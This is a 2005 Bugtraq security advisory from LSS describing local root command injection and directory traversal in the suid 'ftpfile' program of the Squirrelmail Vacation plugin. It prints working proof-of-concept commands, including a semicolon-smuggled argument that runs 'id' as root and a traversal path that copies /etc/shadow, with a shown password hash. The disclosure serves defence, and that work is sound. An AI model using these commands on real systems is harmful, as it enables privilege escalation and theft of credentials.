Squirrelmail vacation v0.15 local root exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Squirrelmail vacation v0.15 local root exploit
From: LSS Security <exposed@xxxxxx>
Date: Tue, 11 Jan 2005 12:50:14 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mutt/1.5.6i

                        LSS Security Advisory #LSS-2005-01-03
                               http://security.lss.hr

---

Title                   :  Squirrelmail vacation v0.15 local root exploit 
Advisory ID             :  LSS-2005-01-03
Date                    :  10.01.2005. 
Advisory URL:           :  
http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact                  :  Privilege escalation and arbitrary file read
Risk level              :  High 
Vulnerability type      :  Local
Vendors contacted       :  No response from vendor


---



===[ Overview 

Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of 
the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz



===[ Vulnerability

Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
The program is used to access local files in user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile. 
Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$  ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ 

It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$ 



===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.



===[ Fix

Not available yet.



===[ PoC Exploit

http://security.lss.hr/exploits/



===[ Credits

Credits for this vulnerability goes to Leon Juranic. 



===[ LSS Security Contact
 
 LSS Security Team, <eXposed by LSS>
 
 WWW    : http://security.lss.hr
 E-mail : security@xxxxxx
 Tel    : +385 1 6129 775

Follow-Ups:
- Re: Squirrelmail vacation v0.15 local root exploit
  - From: p dont think

Prev by Date: [USN-59-1] mailman vulnerabilities
Next by Date: WMV (Windows Media Player) trojan in wild
Previous by thread: [USN-59-1] mailman vulnerabilities
Next by thread: Re: Squirrelmail vacation v0.15 local root exploit
Index(es):
- Date
- Thread